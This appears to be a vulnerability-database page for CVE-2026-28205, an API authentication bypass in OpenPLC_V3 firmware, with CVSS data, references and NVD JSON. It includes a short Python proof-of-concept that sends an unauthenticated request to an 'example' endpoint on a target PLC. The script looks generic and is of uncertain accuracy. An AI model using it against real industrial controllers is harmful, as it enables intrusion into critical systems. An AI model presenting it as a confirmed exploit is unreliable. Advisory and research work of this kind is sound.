CVE-2026-28205

Description

OpenPLC_V3 is vulnerable to an Initialization of a Resource with an Insecure Default vulnerability which could allow an attacker to gain access to the system by bypassing authentication via an API.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:openplcproject:openplc_v3_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:openplcproject:openplc_v3:-:*:*:*:*:*:*:* - NOT VULNERABLE

OpenPLC_V3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit Title: OpenPLC_V3 Insecure Default Initialization Auth Bypass
# Description: This script exploits the default insecure configuration to bypass API authentication.

target_ip = "192.168.1.100"
target_port = "8080"
base_url = f"http://{target_ip}:{target_port}"

# The vulnerability allows accessing the API without authentication headers
# due to insecure default initialization of the auth resource.
endpoint = "/api/users"  # Example sensitive endpoint

try:
    print(f"[*] Attempting to bypass authentication on {base_url}...")
    
    # Sending request without Authorization header
    response = requests.get(f"{base_url}{endpoint}", timeout=5)

    if response.status_code == 200:
        print("[+] Exploit successful! Authentication bypassed.")
        print("[+] Response content:")
        print(response.text)
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")

except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-28205
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-28205
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-28205/
[4] VulDB https://vuldb.com/cve/CVE-2026-28205
[5] https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-10

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-28205", "sourceIdentifier": "[email protected]", "published": "2026-04-09T19:16:23.370", "lastModified": "2026-04-28T17:17:50.793", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenPLC_V3 is vulnerable to an Initialization of a Resource with an Insecure Default vulnerability which could allow an attacker to gain access to the system by bypassing authentication via an API."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:H/VA:H/SC:L/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1188"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:openplcproject:openplc_v3_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "7624BE59-886B-421D-96CC-105F185AE070"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:openplcproject:openplc_v3:-:*:*:*:*:*:*:*", "matchCriteriaId": "6861E863-E6AC-4BFB-8CDE-2328A045540D"}]}]}], "references": [{"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-10", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}